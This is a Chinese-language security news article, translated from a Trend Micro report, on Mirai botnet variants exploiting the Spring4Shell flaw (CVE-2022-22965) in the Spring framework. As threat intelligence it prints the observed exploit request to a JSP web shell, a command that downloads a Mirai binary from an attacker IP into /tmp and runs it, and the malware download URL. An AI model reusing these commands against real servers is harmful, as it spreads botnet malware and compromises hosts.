Mirai僵尸网络利用Spring4Shell漏洞 - 嘶吼 RoarTalk – 网络安全行业综合服务平台,4hou.com

Mirai僵尸网络利用Spring4Shell漏洞

ang010ela 漏洞 2022-04-21 11:45:00
140097
收藏

导语:Mirai僵尸网络变种已经开始利用Spring4Shell漏洞。

Mirai僵尸网络变种已经开始利用Spring4Shell漏洞。

3月底,研究人员发现了Spring4Shell 0day 漏洞,随后补丁发布。4月初,Trend Micro安全研究人员发现有攻击者利用Spring4Shell漏洞武器化Mirai 僵尸网络。

Spring4Shell漏洞概述

Spring框架是一个开源的J2EE应用程序框架,可以帮助软件开发人员快速开发具备企业级特征的Java 应用。近日,安全研究人员在Spring Java框架中发现了2个可以实现远程代码执行的安全漏洞,CVE编号分别是CVE-2022-22963和CVE-2022-22965,CVSS 评分都为9.8分。其中CVE-2022-22965漏洞也叫做Spring4Shell,是由于传递的参数的不安全反序列化引发的,攻击者利用该漏洞可以在应用中实现远程代码执行。

Mirai 利用Spring4Shell漏洞

4月初,研究人员发现有攻击者利用Spring4Shell漏洞武器化Mirai 僵尸网络并在有漏洞的服务器上执行 Mirai 僵尸网络恶意软件,受害者主要位于新加坡地区。

该Mirai样本会被下载到 /tmp文件夹,然后使用chmod修改权限变得可执行之后再执行。漏洞利用请求和命令如下所示:

http://{victim IP}:9090/tomcatwar[.]jsp?pwd=j&cmd=cd%20/tmp;%20wget%20http://45[.]95[.]169[.]143/The420smokeplace[.]dns/KKveTTgaAAsecNNaaaa.x86;chmod%20777%20*;./KKveTTgaAAsecNNaaaa.x86%20mSpring[.]x86
cd /tmp; wget http://45[.]95[.]169[.]143/The420smokeplace.dns/KKveTTgaAAsecNNaaaa.x86;chmod 777 *;./KKveTTgaAAsecNNaaaa.x86 mSpring[.]x86
http://45[.]95[.]169[.]143/The420smokeplace[.]dns/KKveTTgaAAsecNNaaaa.x86

Specific headers and class attributes for the creation of a JSP web shell

研究人员还在恶意软件文件服务器上看到了适用于不同CPU架构的其他变种版本:

Mirai malware samples for different CPU architectures

图 适用于不同CPU架构的Mirai变种

wget.sh脚本会从恶意服务器下载二进制文件,并执行所有样本。执行后,会从硬盘上删除这些文件。从恶意服务器提取的wget.sh内容如下所示:

Content of “wget.sh” as retrieved from a malicious server

图 从恶意服务器提取的wget.sh内容

本文翻译自:https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html如若转载,请注明原文地址
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论

 
本站4hou.com,所使用的字体和图片文字等素材部分来源于原作者或互联网共享平台。如使用任何字体和图片文字有侵犯其版权所有方的,嘶吼将配合联系原作者核实,并做出删除处理。
©2024 北京嘶吼文化传媒有限公司 京ICP备16063439号-1 本站由 提供云计算服务